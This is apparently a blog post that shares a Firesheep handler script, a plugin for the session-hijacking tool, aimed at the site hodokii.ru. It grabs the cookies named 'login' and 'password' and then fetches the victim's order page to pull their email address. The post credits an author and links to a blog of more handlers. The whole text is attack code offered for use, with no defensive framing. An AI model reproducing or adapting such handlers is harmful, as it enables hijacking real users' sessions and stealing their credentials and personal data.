// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/
register({
name: "Hodokii.ru",
domains: [ 'hodokii.ru' ],
sessionCookieNames: [ 'login','password' ],
identifyUser: function () {
var resp = this.httpGet(this.siteUrl + "order");
this.userName = resp.body.querySelector('#easy_email').textContent;
}
});
No comments:
Post a Comment